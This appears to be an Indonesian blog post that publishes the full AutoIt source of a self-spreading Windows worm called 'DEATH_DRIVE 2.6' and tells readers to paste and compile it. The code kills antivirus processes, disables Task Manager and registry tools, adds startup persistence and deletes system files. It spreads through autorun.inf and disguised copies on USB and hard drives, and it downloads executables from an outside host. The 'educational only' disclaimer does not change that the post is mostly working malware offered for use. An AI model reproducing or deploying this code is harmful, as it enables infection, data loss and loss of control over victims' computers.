+++++++++++++
//* INTRO *//
+++++++++++++
banyak orang yang tertarik untuk membuat virus serta antivirus untuk menunjukkan
kehebatannya dalam ilmu programming, membalas dendam, atau mungkin menolong orang dan kemungkinan paling banyak adalah karena iseng.
sudah banyak anak SMP, SMA yang sudah mulai tertarik akan dunia komputer, baik hanya untuk
main Online game atau tertarik untuk programming (seperti saya :D). virspector udah SMP blum yak?? :DD
Bagi mereka yang hanya bermain game online tanpa mengetahui seluk beluk komputer,
mereka tidak tau jika username dan password mereka sewaktu-waktu bisa di curi,
dan seperti biasa, jika itu telah terjadi, merka kan menangis, bertanya, atau mungkin berlalu
begitu saja.
Jika mereka tertarik denagn programming, mereka pasti memiliki jalan pikiran serta logika
yang relatif berbeda dengan teman-teman di sekitar mereka. dan tak jarang, mereka di anggap
sebagai orang aneh oleh orang-orang di sekitar mereka.
++++++++++++
//* Inti *//
++++++++++++
Banyak anak anak yang tertarik dengan virus komputer (tepatnya WORM) dan mencoba mencari source
code worm di internet untuk bermain-main, atau sekedar ingin tau. mereka terlalu malas untuk belajar
programming dan mengembangkan logika mereka sendiri. dan tak jarang keingintahuan mereka membawa
dampak yang lumayan serius (coba pikir, jika mereka menjalankan code yang baru saja mereka temui dan ternyata code tersebut adalah varian dari w32/kspoold. waw... saya yakin, orang tua mereka pasti marah besar, terang saja marah. dokumen penting yang ada di komputer pasti terenkrip dan sulit terbaca).
langsung saja......
saya hanya ingin berbagi.
beberapa waktu lalu saya memiliki pikiran aneh (sarap :D) dan terpikirkan oleh saya untuk menuliskan kode worm.
dan inilah hasilnya....
kode ini hanya untuk di pelajari, bukan untuk permainan. jika kalian tau resikonya, silakan di pelajari, jika kalian tidak tau resiko dari code ini. STOP.!!!! berhenti membaca dan navigasikan browser kamu keluar dari halaman ini.
kode ini di tulis dalam bahasa AUTOIT (www.autoitscript.com).. pelajari terlebih dulu tentang autoit, baru pelajari kode ini karena penjelasan yang saya berikan cuma seadanya [maaf.. saya adalah orang yang malas menjelaskan :DD].
;//* ==================== C O D E S T A R T F R O M H E R E ============================== *//;
; ==============================
====== ;
; DEATH_DRIVE 2.6 ;
; --------------------- ;
; written by poet_freak a.k.a poetro ;
; only for educational purpose only ;
; this code is given freely ;
; without any warranty, use it at ;
; your own risk ;
; december, 14 - 2008, 15.44 pm ;
;all rights reversed ;
; ==================================== ;
Opt("trayiconhide" ,1) ; hide systemtray icon
if ProcessExists("explorer.exe") = true Then ;check the process, if explorer.exe exist
Run(@windowsdir & "deathdrive_daemon.exe") ; run C:\windows\deathdrive_daemon.exe
EndIf
While 1
if ProcessExists("taskmgr.exe") = true Then ;if taskmanager active = True
Shutdown(6) ; force restart computer
endif
If ProcessExists("msconfig.exe") = true Then ; if msconfig active = true
shutdown(6) ; force restart
EndIf
ProcessClose("ansav.exe") ; force close ansav.exe
ProcessClose("pcmav-cln.exe") ; force close pcmav-cln.exe
$reg1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" ; declare var reg1 as HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
$reg2 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion" ; declare var reg2 as HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
RegWrite ($reg1,"daemon","REG_SZ",@windowsdir &"\p0et.exe") ; write registry value at $reg1
RegWrite ($reg1,"Avgsystray","REG_SZ",@windowsdir &"\p0et_freak1.exe")
RegWrite ($reg1,"esetkrn","REG_SZ",@windowsdir &"\p0et_freak2.exe")
RegWrite ($reg1,"NvidCpl","REG_SZ",@windowsdir &"\p0et_freak3.exe")
RegWrite ($reg1,"Msmsgs","REG_SZ",@windowsdir &"\msmsgs.exe")
Regwrite ($reg2 & "\Explorer\Advanced","SuperHidden","REG_DWORD","0") ; write registry value at $reg2
Regwrite ($reg2 & "\Explorer\Advanced","ShowSuperHidden","REG_DWORD","0")
Regwrite ($reg2 & "\Explorer\Advanced","HideFileExt","REG_DWORD","1")
Regwrite ($reg2 & "\Explorer\Advanced","Hidden","REG_DWORD","2")
RegWrite ($reg2 & "\Policies\Explorer","NoFind","REG_DWORD","1")
Regwrite ($reg2 & "\Policies\Explorer","NoFolderOptions","REG_DWORD","1")
Regwrite ($reg2 & "\Policies\Explorer","NoDriveTypeAutoRun","REG_DWORD","91")
RegWrite ($reg2 & "\Policies\Explorer","NoWelcomeScreen","REG_DWORD","1")
Regwrite ($reg2 & "\Policies\system","DisableTaskMgr","REG_DWORD","1")
Regwrite ($reg2 & "\Policies\system","DisableRegistryTools","REG_DWORD","1")
Regwrite ($reg2 & "\Policies\system","ConfirmFileDelete","REG_DWORD","0")
RegWrite("HKEY_CURRENT_USER\Control Panel\International", "s1159", "REG_SZ", "poet")
RegWrite("HKEY_CURRENT_USER\Control Panel\International", "s2359", "REG_SZ", "poet")
RegWrite("HKEY_CURRENT_USER\Control Panel\International\Mouse", "MouseSensitivity", "REG_SZ", "0")
RegWrite("HKEY_CURRENT_USER\Control Panel\International\Mouse", "SwapMouseButtons", "REG_SZ", "1")
FileCopy(@ScriptFullPath,@windowsdir & "\msmsgs.exe") ; create msmsgs.exe at C:\windows
FileCopy(@scriptfullpath,@windowsdir & "\p0et_freak1.exe")
FileCopy(@scriptfullpath,@windowsdir & "\p0et_freak2.exe")
FileCopy(@scriptfullpath,@windowsdir & "\p0et_freak3.exe")
FileCopy(@ScriptFullPath,@TempDir & "\pagefile.pif")
FileCopy(@scriptfullpath,@ProgramFilesDir & "\Common Files\D_loader.exe")
FileSetAttrib(@windowsdir & "\wininit.exe","-R") ; clear read only attribute
FileSetAttrib(@windowsdir & "\msmsgs.exe","+R+H+S") ; create readonly + hidden + system file attribute
FileSetAttrib(@windowsdir & "\p0et_freak1.exe","+R+H+S")
FileSetAttrib(@windowsdir & "\p0et_freak2.exe","+R+H+S")
FileSetAttrib(@windowsdir & "\p0et_freak3.exe","+R+H+S")
FileSetAttrib(@TempDir & "\pagefile.pif","+S+R+H")
FileDelete(@windowsdir &"\wininit.exe") ; delete C:\Windows\wininit.exe
FileDelete(@SystemDir & "\MsVbVm60.dll")
if FileExists(@WindowsDir &"\autorun.inf") <> True Then ; check autorun.inf in c:\windows, if not exist,
$atr = fileOpen(@WindowsDir & "\autorun.inf",2) ; create autorun.inf in C:\windows, then open C:\windows\autorun.inf
FileWrite($atr, "[autorun]" & @CRLF) ; write [autorun]
filewrite($atr, "label=Infected.!" &@crlf) ; write label=infected.! at next line
FileWrite($atr, "open=d_loader.exe" & @CRLF)
FileWrite($atr, "shellexecute=d_loader.exe" &@CRLF)
FileWrite($atr, "shell\Explore\command=d_loader.exe" &@CRLF)
FileWrite($atr, "shell\Open\command=d_loader.exe" &@CRLF)
FileWrite($atr, "shell=Explore")
FileClose($atr) ; close file
FileSetAttrib(@WindowsDir & "\autorun.inf","+R+H+S") ; set file attribute to readonly, hidden, system
EndIf
if FileExists(@MyDocumentsDir & "\death-drive ver. 2.6 readme.txt") <> True Then
$atr = FileOpen(@MyDocumentsDir & "\death-drive ver. 2.6 readme.txt",2)
FileWrite($atr, "to: someone there.... I still love U..." & @CRLF)
Filewrite($atr, "" & @crlf)
Filewrite($atr, "aku tak akan panjang lebar," & @crlf)
Filewrite($atr, " aku hanya ingin tahu jawabmu," & @crlf)
Filewrite($atr, "mengapa di setiap perkataan yang aku katakan dengan tidak serius, kamu percaya," & @crlf)
Filewrite($atr, "namun di saat aku jujur dan mengatakan semua yang memang benar terjadi, kau tak percaya." & @crlf)
Filewrite($atr, "" & @crlf)
Filewrite($atr, "apa salahku??" & @crlf)
Filewrite($atr, "mengapa dirimu begitu??" & @crlf)
Filewrite($atr, "" & @crlf)
Filewrite($atr, "mengapa sampai segitunya dirimu membenciku??" & @crlf)
Filewrite($atr, "" & @crlf)
Filewrite($atr, "01 juni 2009 //* Aku masih sayang padamu *// p0et" & @crlf)
FileClose($atr)
EndIf
$path1 = DriveGetDrive ("REMOVABLE")
if Not @error Then
for $d = 1 to $path1[0]
$flashdrive = $path1[$d]
if $flashdrive <> "A:" and DriveGetFileSystem($flashdrive) <> "" Then
FileSetAttrib($flashdrive & "\autorun.inf","-R")
FileCopy(@ScriptFullPath,$flashdrive &"\d_loader.exe")
FileCopy(@WindowsDir & "\autorun.inf",$flashdrive & "\autorun.inf",1)
FileCopy(@mydocumentsdir & "\death-drive ver. 2.6 readme.txt", $flashdrive & "\death-drive ver. 2.6 readme.txt")
FileSetAttrib($flashdrive & "\autorun.inf","+R+H+S")
FileSetAttrib($flashdrive & "\d_loader.exe","+R+H+S")
; Search1
$search1 = FileFindFirstFile($flashdrive & "\*.")
if $search1 <> -1 Then
$file1 = FileFindNextFile($search1)
FileCopy(@scriptfullpath,$flashdrive &"\"& $file1 &".exe")
FileSetAttrib($flashdrive &"\"& $file1,"+H")
FileSetAttrib($flashdrive &"\"& $file1 &".exe","-H-S")
EndIf
FileClose($search1)
EndIf
Next
EndIf
; Harddisk Drive
$path2 = DriveGetDrive ("FIXED")
if Not @error Then
for $f = 1 to $path2[0]
$drive = $path2[$f]
FileSetAttrib($drive & "\autorun.inf","-R")
FileCopy(@mydocumentsdir & "\death-drive ver. 2.6 readme.txt", $drive & "\death-drive ver. 2.6 readme.txt") ;copy
FileDelete($drive & "\autorun.inf")
FileCopy(@scriptfullpath, $drive & "temp.exe")
Next
EndIf
; *optional, auto-update feature
$webpath = "http://h1.ripway.com/poet_freak/file" ; declare webpath to download update
if FileExists(@systemdir & "\p0et_freak1.exe") = True Then ; check file, if exist download file1.exe from webpath, then rename it to poet_freak1.exe
InetGet($webpath & "/file1.exe",@SystemDir & "\p0et_freak1.exe")
EndIf
if FileExists(@systemdir & "\p0et_freak2.exe") = True Then
InetGet($webpath & "/file2.exe",@SystemDir & "\p0et_freak2.exe")
EndIf
if FileExists(@systemdir & "\p0et_freak3.exe") = True Then
InetGet($webpath & "/file3.exe",@SystemDir & "\p0et_freak3.exe")
EndIf
WEnd ; end of code
;//* ==================== E N D O F C O D E ================================= *//;
SILAKAN DI PASTE-kan kode tersebut di scite. kemudin compile dengan parameter sesuai keinginan anda.
SAYA TIDAK MENYARANKAN UNTUK DI JALANKAN DI KOMPUTER TANPA PROTEKSI ANTIVIRUS DENGAN HEURISTIC SYSTEM YANG BENAR-BENAR STABIL
USE THIS CODE AT UR OWN RISK...!!
seperti yang sering dikatakan oleh ANHARKU "kesalahan merupakan bagian dari pembelajaran" waspadalah.! waspadalah.!
heheheheh......
greetz.
* HrXXX
* Anharku
* Garis Miring
* codenesia member
* Poet_freaks Reversing Community
Langganan:
Posting Komentar (Atom)
Widgeo
Tidak ada komentar:
Posting Komentar